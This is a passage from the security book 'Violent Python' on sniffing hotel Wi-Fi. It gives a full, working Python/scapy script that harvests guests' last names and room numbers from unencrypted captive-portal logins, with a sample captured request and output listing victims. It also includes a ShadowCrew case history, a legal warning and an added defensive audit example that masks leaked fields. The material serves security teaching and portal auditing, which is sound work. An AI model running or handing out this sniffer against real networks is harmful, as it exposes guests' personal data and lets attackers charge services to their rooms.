
Sniffing Hotel Guests

In the document Violent Python (Page 187-190)

Most hotels offer public wireless networks these days. Often these networks fail to encrypt traffic and lack any enterprise authentication or encryption controls. This section examines a scenario where a few lines of Python can exploit this situation and lead to a disastrous disclosure of public information.

Recently, I stayed in a hotel that offered wireless connectivity to guests. After connecting to the wireless network, my web browser directed me to a web page to log on to the network. The credentials for the network included my last name and hotel room number. After providing this information, my browser posted an unencrypted HTTP page back to the server to receive an authentication cookie. Examining this initial HTTP post revealed something interesting. I noticed a string similar to PROVIDED_LAST_NAME=OCONNOR&PROVIDED_ROOM_NUMBER=1337.

The plaintext transmission to the hotel server contained both my last name and hotel room number. The server made no attempt to protect this information, and my browser simply sent this information in the clear. For this particular hotel, a customer’s last name and room number provided the credentials required to eat a steak dinner in the guest restaurant, receive an expensive massage, or even buy items at the gift shop—so you can imagine that hotel guests would not want an attacker to get a hold of this personal information.

FROM THE TRENCHES

The Demise of the Shadow Crew

In September of 2008, the US District Attorney of Massachusetts indicted Albert Gonzalez for wire fraud, damage to computer systems, access device fraud and aggravated identity theft (Heymann, 2008). Albert Gonzalez (AKA soupnazi) used a wireless sniffer to gain access to the computer systems of the TJX Corporation. At the time, the TJX Corporation encrypted their traffic with the flawed and less secure WEP encryption scheme. This oversight allowed Gonzalez’s ShadowCrew to intercept and decrypt the wireless traffic. Their wireless sniffer, along with a variety of other techniques, gained access to over 45.7 million customer cards, including compromised cards at BJ Wholesale, DSW, Office Max, Boston Market, Barnes and Noble, Sports Authority and TJ Maxx.

Seven feet tall and a veteran hacker, Steven Watt conspired with the Shadow Crew in their activities. At the time Watt had a budding career writing real-time trading software (Zetter, 2009). For his role in writing the wireless sniffer, the state sentenced Watt to two years in prison and forced him to pay restitution to TJX in the amount of $171.5 million.

The Wall of Sheep—Passively Listening to Wireless Secrets 179

    POST /common_ip_cgi/hn_seachange.cgi HTTP/1.1
    Host: 10.10.13.37
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3
    Content-Length: 128
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Origin: http://10.10.10.1
    DNT: 1
    Referer: http://10.10.10.1/common_ip_cgi/hn_seachange.cgi
    Content-Type: application/x-www-form-urlencoded
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Connection: keep-alive

    SESSION_ID=deadbeef123456789abcdef1234567890&RETURN_MODE=4&VALIDATION_FLAG=1&PROVIDED_LAST_NAME=OCONNOR&PROVIDED_ROOM_NUMBER=1337

We can now use Python to capture this information from other hotel guests.

Starting a wireless sniffer in Python is rather simple. First, we will identify our interface to capture traffic. Next, our sniffer listens for traffic using the sniff() function—notice this function filters only TCP traffic and forwards all packets to a procedure named findGuest().

    conf.iface = "mon0"
    try:
        print "[*] Starting Hotel Guest Sniffer."
        sniff(filter="tcp", prn=findGuest, store=0)
    except KeyboardInterrupt:
        exit(0)

When the function findGuest receives the packet, it determines if the intercepted packet contains any personal information. First, it copies the raw contents of the payload to a variable named raw. We can then build a regular expression to parse the last name and room number of the guests.

Notice our regular expression for last names accepts any string that begins with LAST_NAME and terminates with an ampersand symbol (&). The regular expression for the hotel guest’s room number captures any string that begins with ROOM_NUMBER.

    def findGuest(pkt):
        # %Raw.load% renders the payload as a quoted Python string, which is
        # why the room-number pattern ends at the closing single quote.
        raw = pkt.sprintf("%Raw.load%")
        name = re.findall("(?i)LAST_NAME=(.*)&", raw)
        room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw)
        # Require both matches so a payload with only one field cannot raise
        # an IndexError on room[0].
        if name and room:
            print "[+] Found Hotel Guest " + str(name[0]) \
                + ", Room #" + str(room[0])

Putting all this together, we now have a wireless hotel guest sniffer to capture the last name and hotel room number of any guest who connects to the wireless network. Notice that we need to import the scapy library in order to have the capability to sniff traffic and parse it.

    import optparse
    import re
    from scapy.all import *


    def findGuest(pkt):
        # %Raw.load% renders the payload as a quoted Python string, which is
        # why the room-number pattern ends at the closing single quote.
        raw = pkt.sprintf('%Raw.load%')
        name = re.findall('(?i)LAST_NAME=(.*)&', raw)
        room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw)
        if name and room:
            print '[+] Found Hotel Guest ' + str(name[0]) + \
                ', Room #' + str(room[0])


    def main():
        parser = optparse.OptionParser('usage %prog ' + \
            '-i<interface>')
        parser.add_option('-i', dest='interface', \
            type='string', help='specify interface to listen on')
        (options, args) = parser.parse_args()
        if options.interface is None:
            print parser.usage
            exit(0)
        else:
            conf.iface = options.interface
        try:
            print '[*] Starting Hotel Guest Sniffer.'
            # Hand every TCP packet to findGuest; store=0 keeps memory flat.
            sniff(filter='tcp', prn=findGuest, store=0)
        except KeyboardInterrupt:
            exit(0)


    if __name__ == '__main__':
        main()

Running our hotel sniffer program, we see how an attacker can identify several guests staying in the hotel.


    attacker# python hotelSniff.py -i wlan0
    [*] Starting Hotel Guest Sniffer.
    [+] Found Hotel Guest MOORE, Room #1337
    [+] Found Hotel Guest VASKOVICH, Room #1984
    [+] Found Hotel Guest BAGGETT, Room #43434343
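The defensive counterpart to the parsing above is an offline audit of a captive portal's own login request: parse the captured POST properly and report which fields travel in the clear, so the operator can see what the portal leaks before anyone else does. This is an added example, not code from Violent Python; the sample request is the one quoted earlier, re-typed as a single string (its header layout is assumed), the set of sensitive field-name fragments is an assumption, and parse_qs is used instead of the page's `(.*)&` regex because it decodes percent-encoding and does not depend on field order.

```python
import re
from urllib.parse import parse_qs

# Constructed sample: the captive-portal POST quoted above, re-typed as one
# request (header layout assumed; Content-Length left as the page shows it).
SAMPLE_REQUEST = (
    "POST /common_ip_cgi/hn_seachange.cgi HTTP/1.1\r\n"
    "Host: 10.10.13.37\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 128\r\n"
    "\r\n"
    "SESSION_ID=deadbeef123456789abcdef1234567890&RETURN_MODE=4"
    "&VALIDATION_FLAG=1&PROVIDED_LAST_NAME=OCONNOR&PROVIDED_ROOM_NUMBER=1337"
)

# Parameter-name fragments that indicate an identifier or credential.
# This list is an assumption for the example; extend it for your own portal.
SENSITIVE_NAMES = re.compile(r"(?i)(LAST_NAME|ROOM_NUMBER|SESSION|PASS|TOKEN)")


def mask(value):
    """Keep the first character so a finding is recognisable but not reusable."""
    return value[:1] + "*" * (len(value) - 1)


def audit_form_post(raw_request):
    """Return {field: masked_value} for sensitive fields in a cleartext form POST.

    The request line and headers are split off first; only POSTs with an
    application/x-www-form-urlencoded body are parsed, via parse_qs, so
    percent-encoded values and field order are handled correctly.
    """
    head, _, body = raw_request.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if request_line.split(" ", 1)[0] != "POST":
        return {}
    if not headers.get("content-type", "").startswith(
            "application/x-www-form-urlencoded"):
        return {}
    fields = parse_qs(body, keep_blank_values=True)
    return {name: mask(values[0]) for name, values in fields.items()
            if SENSITIVE_NAMES.search(name)}


if __name__ == "__main__":
    for field, masked in audit_form_post(SAMPLE_REQUEST).items():
        print("[!] cleartext field %s = %s" % (field, masked))
```

Run against a capture of your own portal's login, the three flagged fields (session id, last name, room number) are exactly the values the page shows being recoverable by anyone on the same unencrypted network.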

I cannot emphasize enough at this time that collection of this information potentially violates several state, federal, and national laws. In the next section, we will further expand our ability to sniff wireless networks by parsing Google searches right out of the air.
